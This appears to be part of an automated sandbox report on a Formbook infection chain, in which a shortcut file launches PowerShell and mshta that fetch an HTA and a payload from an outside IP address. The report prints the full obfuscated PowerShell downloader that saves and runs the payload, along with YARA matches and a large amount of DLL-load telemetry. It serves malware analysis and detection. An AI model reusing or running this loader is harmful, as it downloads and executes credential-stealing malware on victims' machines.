Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023AF28A 14_2_023AF28A
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023CCA8A 14_2_023CCA8A
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023AF281 14_2_023AF281
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023B5BAA 14_2_023B5BAA
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023B5BA8 14_2_023B5BA8
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023B409A 14_2_023B409A
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023AF4AA 14_2_023AF4AA
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 14_2_023AD52A 14_2_023AD52A
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0160EA12 appears 86 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0158B970 appears 268 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 015E7E54 appears 89 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 015D5130 appears 36 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0161F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F37E54 appears 88 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02EDB970 appears 266 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F5EA12 appears 84 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F6F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F25130 appears 36 times
PE file does not import any functions
Source: rooma.exe.5.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Yara signature match
Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: rooma.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rooma.exe.5.dr Static PE information: Section .text
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winLNK@14/15@17/14
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkvo4uk.0pp.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000295D000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.0000000002945000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.000000000295A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Offer Document 24.lnk ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe" Jump to behavior
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
